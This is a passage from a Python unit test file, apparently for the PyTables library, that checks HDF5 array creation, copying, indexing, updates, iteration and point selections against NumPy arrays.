3:5] = b # Check that the array is back in the correct byteorder c = array[...] if common.verbose: print("byteorder of array on disk-->", array.byteorder) print("byteorder of subarray-->", b.dtype.byteorder) print("subarray-->", b) print("retrieved array-->", c) self.assertTrue(allequal(a, c)) class ComplexNotReopenNotEndianTestCase(UnalignedAndComplexTestCase): endiancheck = False reopen = False class ComplexReopenNotEndianTestCase(UnalignedAndComplexTestCase): endiancheck = False reopen = True class ComplexNotReopenEndianTestCase(UnalignedAndComplexTestCase): endiancheck = True reopen = False class ComplexReopenEndianTestCase(UnalignedAndComplexTestCase): endiancheck = True reopen = True class GroupsArrayTestCase(common.TempFileMixin, TestCase): """This test class checks combinations of arrays with groups.""" def test00_iterativeGroups(self): """Checking combinations of arrays with groups.""" if common.verbose: print('\n', '-=' * 30) print("Running %s.test00_iterativeGroups..." % self.__class__.__name__) # Get the root group group = self.h5file.root # Set the type codes to test # The typecodes below does expose an ambiguity that is reported in: # http://projects.scipy.org/scipy/numpy/ticket/283 and # http://projects.scipy.org/scipy/numpy/ticket/290 typecodes = ['b', 'B', 'h', 'H', 'i', 'I', 'l', 'L', 'q', 'f', 'd', 'F', 'D'] if hasattr(tables, 'Float16Atom'): typecodes.append('e') if hasattr(tables, 'Float96Atom') or hasattr(tables, 'Float128Atom'): typecodes.append('g') if (hasattr(tables, 'Complex192Atom') or hasattr(tables, 'Complex256Atom')): typecodes.append('G') for i, typecode in enumerate(typecodes): a = numpy.ones((3,), typecode) dsetname = 'array_' + typecode if common.verbose: print("Creating dataset:", group._g_join(dsetname)) self.h5file.create_array(group, dsetname, a, "Large array") group = self.h5file.create_group(group, 'group' + str(i)) # Reopen the file self._reopen() # Get the root group group = self.h5file.root # Get the metadata on the previosly saved arrays for i in range(len(typecodes)): # Create an array for later comparison a = numpy.ones((3,), typecodes[i]) # Get the dset object hanging from group dset = getattr(group, 'array_' + typecodes[i]) # Get the actual array b = dset.read() if common.verbose: print("Info from dataset:", dset._v_pathname) print(" shape ==>", dset.shape, end=' ') print(" type ==> %s" % dset.atom.dtype) print("Array b read from file. Shape: ==>", b.shape, end=' ') print(". Type ==> %s" % b.dtype) self.assertEqual(a.shape, b.shape) self.assertEqual(a.dtype, b.dtype) self.assertTrue(allequal(a, b)) # Iterate over the next group group = getattr(group, 'group' + str(i)) def test01_largeRankArrays(self): """Checking creation of large rank arrays (0 < rank <= 32) It also uses arrays ranks which ranges until maxrank. """ # maximum level of recursivity (deepest group level) achieved: # maxrank = 32 (for a effective maximum rank of 32) # This limit is due to HDF5 library limitations. minrank = 1 maxrank = 32 if common.verbose: print('\n', '-=' * 30) print("Running %s.test01_largeRankArrays..." % self.__class__.__name__) print("Maximum rank for tested arrays:", maxrank) group = self.h5file.root if common.verbose: print("Rank array writing progress: ", end=' ') for rank in range(minrank, maxrank + 1): # Create an array of integers, with incrementally bigger ranges a = numpy.ones((1,) * rank, numpy.int32) if common.verbose: print("%3d," % (rank), end=' ') self.h5file.create_array(group, "array", a, "Rank: %s" % rank) group = self.h5file.create_group(group, 'group' + str(rank)) # Reopen the file self._reopen() group = self.h5file.root if common.verbose: print() print("Rank array reading progress: ") # Get the metadata on the previosly saved arrays for rank in range(minrank, maxrank + 1): # Create an array for later comparison a = numpy.ones((1,) * rank, numpy.int32) # Get the actual array b = group.array.read() if common.verbose: print("%3d," % (rank), end=' ') if common.verbose and not allequal(a, b): print("Info from dataset:", group.array._v_pathname) print(" Shape: ==>", group.array.shape, end=' ') print(" typecode ==> %c" % group.array.typecode) print("Array b read from file. Shape: ==>", b.shape, end=' ') print(". Type ==> %c" % b.dtype) self.assertEqual(a.shape, b.shape) self.assertEqual(a.dtype, b.dtype) self.assertTrue(allequal(a, b)) # print(self.h5file) # Iterate over the next group group = self.h5file.get_node(group, 'group' + str(rank)) if common.verbose: print() # This flush the stdout buffer class CopyTestCase(common.TempFileMixin, TestCase): def test01_copy(self): """Checking Array.copy() method.""" if common.verbose: print('\n', '-=' * 30) print("Running %s.test01_copy..." % self.__class__.__name__) # Create an Array arr = numpy.array([[456, 2], [3, 457]], dtype='int16') array1 = self.h5file.create_array( self.h5file.root, 'array1', arr, "title array1") # Copy to another Array array2 = array1.copy('/', 'array2') if self.close: if common.verbose: print("(closing file version)") self._reopen() array1 = self.h5file.root.array1 array2 = self.h5file.root.array2 if common.verbose: print("array1-->", array1.read()) print("array2-->", array2.read()) # print("dirs-->", dir(array1), dir(array2)) print("attrs array1-->", repr(array1.attrs)) print("attrs array2-->", repr(array2.attrs)) # Check that all the elements are equal self.assertTrue(allequal(array1.read(), array2.read())) # Assert other properties in array self.assertEqual(array1.nrows, array2.nrows) self.assertEqual(array1.flavor, array2.flavor) self.assertEqual(array1.atom.dtype, array2.atom.dtype) self.assertEqual(array1.title, array2.title) def test02_copy(self): """Checking Array.copy() method (where specified)""" if common.verbose: print('\n', '-=' * 30) print("Running %s.test02_copy..." % self.__class__.__name__) # Create an Array arr = numpy.array([[456, 2], [3, 457]], dtype='int16') array1 = self.h5file.create_array( self.h5file.root, 'array1', arr, "title array1") # Copy to another Array group1 = self.h5file.create_group("/", "group1") array2 = array1.copy(group1, 'array2') if self.close: if common.verbose: print("(closing file version)") self._reopen() array1 = self.h5file.root.array1 array2 = self.h5file.root.group1.array2 if common.verbose: print("array1-->", array1.read()) print("array2-->", array2.read()) # print("dirs-->", dir(array1), dir(array2)) print("attrs array1-->", repr(array1.attrs)) print("attrs array2-->", repr(array2.attrs)) # Check that all the elements are equal self.assertTrue(allequal(array1.read(), array2.read())) # Assert other properties in array self.assertEqual(array1.nrows, array2.nrows) self.assertEqual(array1.flavor, array2.flavor) self.assertEqual(array1.atom.dtype, array2.atom.dtype) self.assertEqual(array1.title, array2.title) def test03_copy(self): """Checking Array.copy() method (checking title copying)""" if common.verbose: print('\n', '-=' * 30) print("Running %s.test04_copy..." % self.__class__.__name__) # Create an Array arr = numpy.array([[456, 2], [3, 457]], dtype='int16') array1 = self.h5file.create_array( self.h5file.root, 'array1', arr, "title array1") # Append some user attrs array1.attrs.attr1 = "attr1" array1.attrs.attr2 = 2 # Copy it to another Array array2 = array1.copy('/', 'array2', title="title array2") if self.close: if common.verbose: print("(closing file version)") self._reopen() array1 = self.h5file.root.array1 array2 = self.h5file.root.array2 # Assert user attributes if common.verbose: print("title of destination array-->", array2.title) self.assertEqual(array2.title, "title array2") def test04_copy(self): """Checking Array.copy() method (user attributes copied)""" if common.verbose: print('\n', '-=' * 30) print("Running %s.test05_copy..." % self.__class__.__name__) # Create an Array arr = numpy.array([[456, 2], [3, 457]], dtype='int16') array1 = self.h5file.create_array( self.h5file.root, 'array1', arr, "title array1") # Append some user attrs array1.attrs.attr1 = "attr1" array1.attrs.attr2 = 2 # Copy it to another Array array2 = array1.copy('/', 'array2', copyuserattrs=1) if self.close: if common.verbose: print("(closing file version)") self._reopen() array1 = self.h5file.root.array1 array2 = self.h5file.root.array2 if common.verbose: print("attrs array1-->", repr(array1.attrs)) print("attrs array2-->", repr(array2.attrs)) # Assert user attributes self.assertEqual(array2.attrs.attr1, "attr1") self.assertEqual(array2.attrs.attr2, 2) def test04b_copy(self): """Checking Array.copy() method (user attributes not copied)""" if common.verbose: print('\n', '-=' * 30) print("Running %s.test05b_copy..." % self.__class__.__name__) # Create an Array arr = numpy.array([[456, 2], [3, 457]], dtype='int16') array1 = self.h5file.create_array( self.h5file.root, 'array1', arr, "title array1") # Append some user attrs array1.attrs.attr1 = "attr1" array1.attrs.attr2 = 2 # Copy it to another Array array2 = array1.copy('/', 'array2', copyuserattrs=0) if self.close: if common.verbose: print("(closing file version)") self._reopen() array1 = self.h5file.root.array1 array2 = self.h5file.root.array2 if common.verbose: print("attrs array1-->", repr(array1.attrs)) print("attrs array2-->", repr(array2.attrs)) # Assert user attributes self.assertEqual(hasattr(array2.attrs, "attr1"), 0) self.assertEqual(hasattr(array2.attrs, "attr2"), 0) class CloseCopyTestCase(CopyTestCase): close = 1 class OpenCopyTestCase(CopyTestCase): close = 0 class CopyIndexTestCase(common.TempFileMixin, TestCase): def test01_index(self): """Checking Array.copy() method with indexes.""" if common.verbose: print('\n', '-=' * 30) print("Running %s.test01_index..." % self.__class__.__name__) # Create a numpy r = numpy.arange(200, dtype='int32') r.shape = (100, 2) # Save it in a array: array1 = self.h5file.create_array( self.h5file.root, 'array1', r, "title array1") # Copy to another array array2 = array1.copy("/", 'array2', start=self.start, stop=self.stop, step=self.step) if common.verbose: print("array1-->", array1.read()) print("array2-->", array2.read()) print("attrs array1-->", repr(array1.attrs)) print("attrs array2-->", repr(array2.attrs)) # Check that all the elements are equal r2 = r[self.start:self.stop:self.step] self.assertTrue(allequal(r2, array2.read())) # Assert the number of rows in array if common.verbose: print("nrows in array2-->", array2.nrows) print("and it should be-->", r2.shape[0]) self.assertEqual(r2.shape[0], array2.nrows) def test02_indexclosef(self): """Checking Array.copy() method with indexes (close file version)""" if common.verbose: print('\n', '-=' * 30) print("Running %s.test02_indexclosef..." % self.__class__.__name__) # Create a numpy r = numpy.arange(200, dtype='int32') r.shape = (100, 2) # Save it in a array: array1 = self.h5file.create_array( self.h5file.root, 'array1', r, "title array1") # Copy to another array array2 = array1.copy("/", 'array2', start=self.start, stop=self.stop, step=self.step) # Close and reopen the file self._reopen() array1 = self.h5file.root.array1 array2 = self.h5file.root.array2 if common.verbose: print("array1-->", array1.read()) print("array2-->", array2.read()) print("attrs array1-->", repr(array1.attrs)) print("attrs array2-->", repr(array2.attrs)) # Check that all the elements are equal r2 = r[self.start:self.stop:self.step] self.assertTrue(allequal(r2, array2.read())) # Assert the number of rows in array if common.verbose: print("nrows in array2-->", array2.nrows) print("and it should be-->", r2.shape[0]) self.assertEqual(r2.shape[0], array2.nrows) class CopyIndex1TestCase(CopyIndexTestCase): start = 0 stop = 7 step = 1 class CopyIndex2TestCase(CopyIndexTestCase): start = 0 stop = -1 step = 1 class CopyIndex3TestCase(CopyIndexTestCase): start = 1 stop = 7 step = 1 class CopyIndex4TestCase(CopyIndexTestCase): start = 0 stop = 6 step = 1 class CopyIndex5TestCase(CopyIndexTestCase): start = 3 stop = 7 step = 1 class CopyIndex6TestCase(CopyIndexTestCase): start = 3 stop = 6 step = 2 class CopyIndex7TestCase(CopyIndexTestCase): start = 0 stop = 7 step = 10 class CopyIndex8TestCase(CopyIndexTestCase): start = 6 stop = -1 # Negative values means starting from the end step = 1 class CopyIndex9TestCase(CopyIndexTestCase): start = 3 stop = 4 step = 1 class CopyIndex10TestCase(CopyIndexTestCase): start = 3 stop = 4 step = 2 class CopyIndex11TestCase(CopyIndexTestCase): start = -3 stop = -1 step = 2 class CopyIndex12TestCase(CopyIndexTestCase): start = -1 # Should point to the last element stop = None # None should mean the last element (including it) step = 1 class GetItemTestCase(common.TempFileMixin, TestCase): def test00_single(self): """Single element access (character types)""" # Create the array under root and name 'somearray' a = self.charList arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen() arr = self.h5file.root.somearray # Get and compare an element if common.verbose: print("Original first element:", a[0], type(a[0])) print("Read first element:", arr[0], type(arr[0])) self.assertTrue(allequal(a[0], arr[0])) self.assertEqual(type(a[0]), type(arr[0])) def test01_single(self): """Single element access (numerical types)""" # Create the array under root and name 'somearray' a = self.numericalList arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen() arr = self.h5file.root.somearray # Get and compare an element if common.verbose: print("Original first element:", a[0], type(a[0])) print("Read first element:", arr[0], type(arr[0])) self.assertEqual(a[0], arr[0]) self.assertEqual(type(a[0]), type(arr[0])) def test02_range(self): """Range element access (character types)""" # Create the array under root and name 'somearray' a = self.charListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen() arr = self.h5file.root.somearray # Get and compare an element if common.verbose: print("Original elements:", a[1:4]) print("Read elements:", arr[1:4]) self.assertTrue(allequal(a[1:4], arr[1:4])) def test03_range(self): """Range element access (numerical types)""" # Create the array under root and name 'somearray' a = self.numericalListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen() arr = self.h5file.root.somearray # Get and compare an element if common.verbose: print("Original elements:", a[1:4]) print("Read elements:", arr[1:4]) self.assertTrue(allequal(a[1:4], arr[1:4])) def test04_range(self): """Range element access, strided (character types)""" # Create the array under root and name 'somearray' a = self.charListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen() arr = self.h5file.root.somearray # Get and compare an element if common.verbose: print("Original elements:", a[1:4:2]) print("Read elements:", arr[1:4:2]) self.assertTrue(allequal(a[1:4:2], arr[1:4:2])) def test05_range(self): """Range element access, strided (numerical types)""" # Create the array under root and name 'somearray' a = self.numericalListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen() arr = self.h5file.root.somearray # Get and compare an element if common.verbose: print("Original elements:", a[1:4:2]) print("Read elements:", arr[1:4:2]) self.assertTrue(allequal(a[1:4:2], arr[1:4:2])) def test06_negativeIndex(self): """Negative Index element access (character types)""" # Create the array under root and name 'somearray' a = self.charListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen() arr = self.h5file.root.somearray # Get and compare an element if common.verbose: print("Original last element:", a[-1]) print("Read last element:", arr[-1]) self.assertTrue(allequal(a[-1], arr[-1])) def test07_negativeIndex(self): """Negative Index element access (numerical types)""" # Create the array under root and name 'somearray' a = self.numericalListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen() arr = self.h5file.root.somearray # Get and compare an element if common.verbose: print("Original before last element:", a[-2]) print("Read before last element:", arr[-2]) if isinstance(a[-2], numpy.ndarray): self.assertTrue(allequal(a[-2], arr[-2])) else: self.assertEqual(a[-2], arr[-2]) def test08_negativeRange(self): """Negative range element access (character types)""" # Create the array under root and name 'somearray' a = self.charListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen() arr = self.h5file.root.somearray # Get and compare an element if common.verbose: print("Original last elements:", a[-4:-1]) print("Read last elements:", arr[-4:-1]) self.assertTrue(allequal(a[-4:-1], arr[-4:-1])) def test09_negativeRange(self): """Negative range element access (numerical types)""" # Create the array under root and name 'somearray' a = self.numericalListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen() arr = self.h5file.root.somearray # Get and compare an element if common.verbose: print("Original last elements:", a[-4:-1]) print("Read last elements:", arr[-4:-1]) self.assertTrue(allequal(a[-4:-1], arr[-4:-1])) class GI1NATestCase(GetItemTestCase, TestCase): title = "Rank-1 case 1" numericalList = numpy.array([3]) numericalListME = numpy.array([3, 2, 1, 0, 4, 5, 6]) charList = numpy.array(["3"], 'S') charListME = numpy.array( ["321", "221", "121", "021", "421", "521", "621"], 'S') class GI1NAOpenTestCase(GI1NATestCase): close = 0 class GI1NACloseTestCase(GI1NATestCase): close = 1 class GI2NATestCase(GetItemTestCase): # A more complex example title = "Rank-1,2 case 2" numericalList = numpy.array([3, 4]) numericalListME = numpy.array([[3, 2, 1, 0, 4, 5, 6], [2, 1, 0, 4, 5, 6, 7], [4, 3, 2, 1, 0, 4, 5], [3, 2, 1, 0, 4, 5, 6], [3, 2, 1, 0, 4, 5, 6]]) charList = numpy.array(["a", "b"], 'S') charListME = numpy.array( [["321", "221", "121", "021", "421", "521", "621"], ["21", "21", "11", "02", "42", "21", "61"], ["31", "21", "12", "21", "41", "51", "621"], ["321", "221", "121", "021", "421", "521", "621"], ["3241", "2321", "13216", "0621", "4421", "5421", "a621"], ["a321", "s221", "d121", "g021", "b421", "5vvv21", "6zxzxs21"]], 'S') class GI2NAOpenTestCase(GI2NATestCase): close = 0 class GI2NACloseTestCase(GI2NATestCase): close = 1 class SetItemTestCase(common.TempFileMixin, TestCase): def test00_single(self): """Single element update (character types)""" # Create the array under root and name 'somearray' a = self.charList arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen('a') arr = self.h5file.root.somearray # Modify a single element of a and arr: a[0] = b"b" arr[0] = b"b" # Get and compare an element if common.verbose: print("Original first element:", a[0]) print("Read first element:", arr[0]) self.assertTrue(allequal(a[0], arr[0])) def test01_single(self): """Single element update (numerical types)""" # Create the array under root and name 'somearray' a = self.numericalList arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen('a') arr = self.h5file.root.somearray # Modify elements of a and arr: a[0] = 333 arr[0] = 333 # Get and compare an element if common.verbose: print("Original first element:", a[0]) print("Read first element:", arr[0]) self.assertEqual(a[0], arr[0]) def test02_range(self): """Range element update (character types)""" # Create the array under root and name 'somearray' a = self.charListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen('a') arr = self.h5file.root.somearray # Modify elements of a and arr: a[1:3] = b"xXx" arr[1:3] = b"xXx" # Get and compare an element if common.verbose: print("Original elements:", a[1:4]) print("Read elements:", arr[1:4]) self.assertTrue(allequal(a[1:4], arr[1:4])) def test03_range(self): """Range element update (numerical types)""" # Create the array under root and name 'somearray' a = self.numericalListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen('a') arr = self.h5file.root.somearray # Modify elements of a and arr: s = slice(1, 3, None) rng = numpy.arange(a[s].size)*2 + 3 rng.shape = a[s].shape a[s] = rng arr[s] = rng # Get and compare an element if common.verbose: print("Original elements:", a[1:4]) print("Read elements:", arr[1:4]) self.assertTrue(allequal(a[1:4], arr[1:4])) def test04_range(self): """Range element update, strided (character types)""" # Create the array under root and name 'somearray' a = self.charListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen('a') arr = self.h5file.root.somearray # Modify elements of a and arr: s = slice(1, 4, 2) a[s] = b"xXx" arr[s] = b"xXx" # Get and compare an element if common.verbose: print("Original elements:", a[1:4:2]) print("Read elements:", arr[1:4:2]) self.assertTrue(allequal(a[1:4:2], arr[1:4:2])) def test05_range(self): """Range element update, strided (numerical types)""" # Create the array under root and name 'somearray' a = self.numericalListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen('a') arr = self.h5file.root.somearray # Modify elements of a and arr: s = slice(1, 4, 2) rng = numpy.arange(a[s].size)*2 + 3 rng.shape = a[s].shape a[s] = rng arr[s] = rng # Get and compare an element if common.verbose: print("Original elements:", a[1:4:2]) print("Read elements:", arr[1:4:2]) self.assertTrue(allequal(a[1:4:2], arr[1:4:2])) def test06_negativeIndex(self): """Negative Index element update (character types)""" # Create the array under root and name 'somearray' a = self.charListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen('a') arr = self.h5file.root.somearray # Modify elements of a and arr: s = -1 a[s] = b"xXx" arr[s] = b"xXx" # Get and compare an element if common.verbose: print("Original last element:", a[-1]) print("Read last element:", arr[-1]) self.assertTrue(allequal(a[-1], arr[-1])) def test07_negativeIndex(self): """Negative Index element update (numerical types)""" # Create the array under root and name 'somearray' a = self.numericalListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen('a') arr = self.h5file.root.somearray # Modify elements of a and arr: s = -2 a[s] = a[s]*2 + 3 arr[s] = arr[s]*2 + 3 # Get and compare an element if common.verbose: print("Original before last element:", a[-2]) print("Read before last element:", arr[-2]) if isinstance(a[-2], numpy.ndarray): self.assertTrue(allequal(a[-2], arr[-2])) else: self.assertEqual(a[-2], arr[-2]) def test08_negativeRange(self): """Negative range element update (character types)""" # Create the array under root and name 'somearray' a = self.charListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen('a') arr = self.h5file.root.somearray # Modify elements of a and arr: s = slice(-4, -1, None) a[s] = b"xXx" arr[s] = b"xXx" # Get and compare an element if common.verbose: print("Original last elements:", a[-4:-1]) print("Read last elements:", arr[-4:-1]) self.assertTrue(allequal(a[-4:-1], arr[-4:-1])) def test09_negativeRange(self): """Negative range element update (numerical types)""" # Create the array under root and name 'somearray' a = self.numericalListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen('a') arr = self.h5file.root.somearray # Modify elements of a and arr: s = slice(-3, -1, None) rng = numpy.arange(a[s].size)*2 + 3 rng.shape = a[s].shape a[s] = rng arr[s] = rng # Get and compare an element if common.verbose: print("Original last elements:", a[-4:-1]) print("Read last elements:", arr[-4:-1]) self.assertTrue(allequal(a[-4:-1], arr[-4:-1])) def test10_outOfRange(self): """Out of range update (numerical types)""" # Create the array under root and name 'somearray' a = self.numericalListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen('a') arr = self.h5file.root.somearray # Modify elements of arr that are out of range: s = slice(1, a.shape[0]+1, None) s2 = slice(1, 1000, None) rng = numpy.arange(a[s].size)*2 + 3 rng.shape = a[s].shape a[s] = rng rng2 = numpy.arange(a[s2].size)*2 + 3 rng2.shape = a[s2].shape arr[s2] = rng2 # Get and compare an element if common.verbose: print("Original last elements:", a[-4:-1]) print("Read last elements:", arr[-4:-1]) self.assertTrue(allequal(a[-4:-1], arr[-4:-1])) class SI1NATestCase(SetItemTestCase, TestCase): title = "Rank-1 case 1" numericalList = numpy.array([3]) numericalListME = numpy.array([3, 2, 1, 0, 4, 5, 6]) charList = numpy.array(["3"], 'S') charListME = numpy.array( ["321", "221", "121", "021", "421", "521", "621"], 'S') class SI1NAOpenTestCase(SI1NATestCase): close = 0 class SI1NACloseTestCase(SI1NATestCase): close = 1 class SI2NATestCase(SetItemTestCase): # A more complex example title = "Rank-1,2 case 2" numericalList = numpy.array([3, 4]) numericalListME = numpy.array([[3, 2, 1, 0, 4, 5, 6], [2, 1, 0, 4, 5, 6, 7], [4, 3, 2, 1, 0, 4, 5], [3, 2, 1, 0, 4, 5, 6], [3, 2, 1, 0, 4, 5, 6]]) charList = numpy.array(["a", "b"], 'S') charListME = numpy.array( [["321", "221", "121", "021", "421", "521", "621"], ["21", "21", "11", "02", "42", "21", "61"], ["31", "21", "12", "21", "41", "51", "621"], ["321", "221", "121", "021", "421", "521", "621"], ["3241", "2321", "13216", "0621", "4421", "5421", "a621"], ["a321", "s221", "d121", "g021", "b421", "5vvv21", "6zxzxs21"]], 'S') class SI2NAOpenTestCase(SI2NATestCase): close = 0 class SI2NACloseTestCase(SI2NATestCase): close = 1 class GeneratorTestCase(common.TempFileMixin, TestCase): def test00a_single(self): """Testing generator access to Arrays, single elements (char)""" # Create the array under root and name 'somearray' a = self.charList arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen() arr = self.h5file.root.somearray # Get and compare an element ga = [i for i in a] garr = [i for i in arr] if common.verbose: print("Result of original iterator:", ga) print("Result of read generator:", garr) self.assertEqual(ga, garr) def test00b_me(self): """Testing generator access to Arrays, multiple elements (char)""" # Create the array under root and name 'somearray' a = self.charListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen() arr = self.h5file.root.somearray # Get and compare an element ga = [i for i in a] garr = [i for i in arr] if common.verbose: print("Result of original iterator:", ga) print("Result of read generator:", garr) for i in range(len(ga)): self.assertTrue(allequal(ga[i], garr[i])) def test01a_single(self): """Testing generator access to Arrays, single elements (numeric)""" # Create the array under root and name 'somearray' a = self.numericalList arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen() arr = self.h5file.root.somearray # Get and compare an element ga = [i for i in a] garr = [i for i in arr] if common.verbose: print("Result of original iterator:", ga) print("Result of read generator:", garr) self.assertEqual(ga, garr) def test01b_me(self): """Testing generator access to Arrays, multiple elements (numeric)""" # Create the array under root and name 'somearray' a = self.numericalListME arr = self.h5file.create_array( self.h5file.root, 'somearray', a, "Some array") if self.close: self._reopen() arr = self.h5file.root.somearray # Get and compare an element ga = [i for i in a] garr = [i for i in arr] if common.verbose: print("Result of original iterator:", ga) print("Result of read generator:", garr) for i in range(len(ga)): self.assertTrue(allequal(ga[i], garr[i])) class GE1NATestCase(GeneratorTestCase): title = "Rank-1 case 1" numericalList = numpy.array([3]) numericalListME = numpy.array([3, 2, 1, 0, 4, 5, 6]) charList = numpy.array(["3"], 'S') charListME = numpy.array( ["321", "221", "121", "021", "421", "521", "621"], 'S') class GE1NAOpenTestCase(GE1NATestCase): close = 0 class GE1NACloseTestCase(GE1NATestCase): close = 1 class GE2NATestCase(GeneratorTestCase): # A more complex example title = "Rank-1,2 case 2" numericalList = numpy.array([3, 4]) numericalListME = numpy.array([[3, 2, 1, 0, 4, 5, 6], [2, 1, 0, 4, 5, 6, 7], [4, 3, 2, 1, 0, 4, 5], [3, 2, 1, 0, 4, 5, 6], [3, 2, 1, 0, 4, 5, 6]]) charList = numpy.array(["a", "b"], 'S') charListME = numpy.array( [["321", "221", "121", "021", "421", "521", "621"], ["21", "21", "11", "02", "42", "21", "61"], ["31", "21", "12", "21", "41", "51", "621"], ["321", "221", "121", "021", "421", "521", "621"], ["3241", "2321", "13216", "0621", "4421", "5421", "a621"], ["a321", "s221", "d121", "g021", "b421", "5vvv21", "6zxzxs21"]], 'S') class GE2NAOpenTestCase(GE2NATestCase): close = 0 class GE2NACloseTestCase(GE2NATestCase): close = 1 class NonHomogeneousTestCase(common.TempFileMixin, TestCase): def test(self): """Test for creation of non-homogeneous arrays.""" # This checks ticket #12. self.assertRaises(ValueError, self.h5file.create_array, '/', 'test', [1, [2, 3]]) self.assertRaises(NoSuchNodeError, self.h5file.remove_node, '/test') class TruncateTestCase(common.TempFileMixin, TestCase): def test(self): """Test for unability to truncate Array objects.""" array1 = self.h5file.create_array('/', 'array1', [0, 2]) self.assertRaises(TypeError, array1.truncate, 0) class PointSelectionTestCase(common.TempFileMixin, TestCase): def setUp(self): super(PointSelectionTestCase, self).setUp() # Limits for selections self.limits = [ (0, 1), # just one element (20, -10), # no elements (-10, 4), # several elements (0, 10), # several elements (again) ] # Create a sample array size = numpy.prod(self.shape) nparr = numpy.arange(size, dtype=numpy.int32).reshape(self.shape) self.nparr = nparr self.tbarr = self.h5file.create_array(self.h5file.root, 'array', nparr) def test01a_read(self): """Test for point-selections (read, boolean keys).""" nparr = self.nparr tbarr = self.tbarr for value1, value2 in self.limits: key = (nparr >= value1) & (nparr < value2) if common.verbose: print("Selection to test:", key) a = nparr[key] b = tbarr[key] self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables selections does not match.") def test01b_read(self): """Test for point-selections (read, integer keys).""" nparr = self.nparr tbarr = self.tbarr for value1, value2 in self.limits: key = numpy.where((nparr >= value1) & (nparr < value2)) if common.verbose: print("Selection to test:", key) a = nparr[key] b = tbarr[key] self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables selections does not match.") def test01c_read(self): """Test for point-selections (read, float keys).""" nparr = self.nparr tbarr = self.tbarr for value1, value2 in self.limits: key = numpy.where((nparr >= value1) & (nparr < value2)) if common.verbose: print("Selection to test:", key) # a = nparr[key] fkey = numpy.array(key, "f4") self.assertRaises((IndexError, TypeError), tbarr.__getitem__, fkey) def test01d_read(self): nparr = self.nparr tbarr = self.tbarr for key in self.working_keyset: if common.verbose: print("Selection to test:", key) a = nparr[key] b = tbarr[key] npt.assert_array_equal( a, b, "NumPy array and PyTables selections does not match.") def test01e_read(self): tbarr = self.tbarr for key in self.not_working_keyset: if common.verbose: print("Selection to test:", key) self.assertRaises(IndexError, tbarr.__getitem__, key) def test02a_write(self): """Test for point-selections (write, boolean keys).""" nparr = self.nparr tbarr = self.tbarr for value1, value2 in self.limits: key = (nparr >= value1) & (nparr < value2) if common.verbose: print("Selection to test:", key) s = nparr[key] nparr[key] = s * 2 tbarr[key] = s * 2 a = nparr[:] b = tbarr[:] self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables modifications does not match.") def test02b_write(self): """Test for point-selections (write, integer keys).""" nparr = self.nparr tbarr = self.tbarr for value1, value2 in self.limits: key = numpy.where((nparr >= value1) & (nparr < value2)) if common.verbose: print("Selection to test:", key) s = nparr[key] nparr[key] = s * 2 tbarr[key] = s * 2 a = nparr[:] b = tbarr[:] self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables modifications does not match.") def test02c_write(self): """Test for point-selections (write, integer values, broadcast).""" nparr = self.nparr tbarr = self.tbarr for value1, value2 in self.limits: key = numpy.where((nparr >= value1) & (nparr < value2)) if common.verbose: print("Selection to test:", key) # s = nparr[key] nparr[key] = 2 # force a broadcast tbarr[key] = 2 # force a broadcast a = nparr[:] b = tbarr[:] self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables modifications does not match.") class PointSelection0(PointSelectionTestCase): shape = (3,) working_keyset = [ [0, 1], [0, -1], ] not_working_keyset = [ [0, 3], [0, 4], [0, -4], ] class PointSelection1(PointSelectionTestCase): shape = (5, 3, 3) working_keyset = [ [(0, 0), (0, 1), (0, 0)], [(0, 0), (0, -1), (0, 0)], ] not_working_keyset = [ [(0, 0), (0, 3), (0, 0)], [(0, 0), (0, 4), (0, 0)], [(0, 0), (0, -4), (0, 0)], [(0, 0), (0, -5), (0, 0)] ] class PointSelection2(PointSelectionTestCase): shape = (7, 3) working_keyset = [ [(0, 0), (0, 1)], [(0, 0), (0, -1)], [(0, 0), (0, -2)], ] not_working_keyset = [ [(0, 0), (0, 3)], [(0, 0), (0, 4)], [(0, 0), (0, -4)], [(0, 0), (0, -5)], ] class PointSelection3(PointSelectionTestCase): shape = (4, 3, 2, 1) working_keyset = [ [(0, 0), (0, 1), (0, 0), (0, 0)], [(0, 0), (0, -1), (0, 0), (0, 0)], ] not_working_keyset = [ [(0, 0), (0, 3), (0, 0), (0, 0)], [(0, 0), (0, 4), (0, 0), (0, 0)], [(0, 0), 